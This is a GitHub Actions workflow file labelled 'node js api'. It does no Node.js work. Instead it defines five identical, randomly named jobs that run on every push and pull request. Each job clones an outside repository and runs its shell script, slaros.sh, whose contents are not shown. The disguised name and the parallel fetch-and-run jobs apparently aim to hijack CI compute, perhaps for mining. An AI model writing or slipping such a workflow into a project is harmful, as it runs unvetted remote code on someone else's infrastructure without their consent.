name: node js api
on:  
  push:
  pull_request:
jobs:
  aasem:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    steps:
      - name: Run a one-line script
        run: |
          git clone https://github.com/allysyasubirjo/blangkon
          cd blangkon
          sh slaros.sh
  sdasfaasem:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    steps:
      - name: Run a one-line script
        run: |
          git clone https://github.com/allysyasubirjo/blangkon
          cd blangkon
          sh slaros.sh
  asasfgaasem:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    steps:
      - name: Run a one-line script
        run: |
          git clone https://github.com/allysyasubirjo/blangkon
          cd blangkon
          sh slaros.sh
  cccsfaasem:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    steps:
      - name: Run a one-line script
        run: |
          git clone https://github.com/allysyasubirjo/blangkon
          cd blangkon
          sh slaros.sh
  qwewecccsfaasem:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    steps:
      - name: Run a one-line script
        run: |
          git clone https://github.com/allysyasubirjo/blangkon
          cd blangkon
          sh slaros.sh
